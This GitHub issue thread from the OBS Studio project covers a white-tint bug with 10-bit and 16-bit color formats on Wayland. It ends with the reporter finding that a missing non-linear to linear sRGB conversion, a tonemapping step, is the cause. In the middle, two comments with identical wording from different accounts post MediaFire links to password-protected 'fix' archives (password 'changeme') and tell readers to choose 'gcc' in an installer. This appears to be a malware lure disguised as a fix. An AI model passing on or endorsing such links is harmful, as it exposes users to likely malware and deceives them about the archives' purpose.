### ISSUE TITLE
10-bit and 16-bit color formats cause white-tint

### ISSUE THREAD

**Issue by PancakeTAS** [obsproject/obs-studio#11196]
### Operating System Info

Other

### Other OS

Arch Linux

### OBS Studio Version

Other

### OBS Studio Version (Other)

30.2.1

### OBS Studio Log URL

https://obsproject.com/logs/0DZwRgZ2bxtAJaBs

### Expected Behavior

The GS_R10G10B10A2 texture created from a XB30 dmabuf through my obs plugin, should look "normal" and not have a white tint or extremely high gamma when switching to a 10-bit or 16-bit color format.

### Current Behavior

A super white-tinted texture was observed in the preview, monitors and resulting video file
![image](https://github.com/user-attachments/assets/b2277fd8-8849-4b2a-8a2f-f2c91cf46b44).

This issue disappears when selecting *any* 8-bit color format. However even when capturing an 8-bit monitor and creating an 8-bit texture from an 8-bit dmabuf the white tint appears.

### Steps to Reproduce

1. Create either a pipewire capture, wlroots screencopy capture using [my plugin](https://github.com/PancakeTAS/obs-wlroots-screencopy) which I initially observed the issue with, or any other source that involves rendering a texture (I have been able to recreate this with obs-vkcapture as well)
2. Switch the OBS color format to any 10-bit format
3. Observe the white-tint

Video showcasing the issue:

https://github.com/user-attachments/assets/1c1680d5-f793-42eb-99d9-50e6a7f56b69

### Anything else we should know?

It is worth noting that Hyprland, my current compositor, has issues rendering 10-bit applications properly currently. While I don't believe OBS not working is *Hyprlands* fault, an NVIDIA driver issue could be a possibility.

On an somewhat related note, why is there no option to have a 4:4:4 10-bit color format? I imagine selecting the 4:4:4 16-bit color format combined with a custom ffmpeg output will be able to capture in yuvj44410le, however being able to use the encoder directly would be nice.

**Comment by kkartaltepe** [comment]
I'm not sure what you expect. If you pass in an HDR image it must be tonemapped to display on an SDR program (obs preview), if you want the full SDR range to preserved then that means all HDR range content will be clipped to SDR providing a rather unpleasant experience for users of HDR.

I have not looked at your plugin but if you are also not applying the proper HDR gamma curve to your data and just passing through SDR bits its going to be even worse.

**Comment by mengyanshou** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by Bongton** [comment]
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by PancakeTAS** [comment]
> I'm not sure what you expect. If you pass in an HDR image it must be tonemapped to display on an SDR program (obs preview), if you want the full SDR range to preserved then that means all HDR range content will be clipped to SDR providing a rather unpleasant experience for users of HDR.
> 
> I have not looked at your plugin but if you are also not applying the proper HDR gamma curve to your data and just passing through SDR bits its going to be even worse.

I am not passing an HDR image.. it's your average sRGB 10-bit image (unless your definition of HDR is non 8-bit color depth), as my monitor supports 10-bit color depth.
I don't really understand what you're trying to say here.. 

Why am I able to render the 10-bit sRGB image onto an 8-bit sRGB obs buffer without any problems? Why am I not able to *copy* the 10-bit sRGB image onto a 10-bit sRGB buffer?
Why would I have to apply an HDR gamma curve.. if my source and destination are in the same color space..

Also, none of this explains a white-tint background.. if my source image contains RGB 0, 0, 0, then no matter what kind of magic happens there's no way that black color turns into something gray or even white

**Comment by mazylol** [comment]
I would like to add that I just did testing of my own and can confirm that this is a wayland issue. This behavior happens in Hyprland and Gnome. It does not occur in xorg. Nonetheless, this is a bug and should be investigated.

**Comment by PancakeTAS** [comment]
After some investigating with @lain.b on discord we've quickly figured out that the issue was indeed one of tonemapping. Turns out switching to any format with more than just 8-bits requires a non-linear sRGB to linear sRGB conversion. Since this is an issue with the integrated PipeWire capture plugin as well, another issue regarding that should be opened.
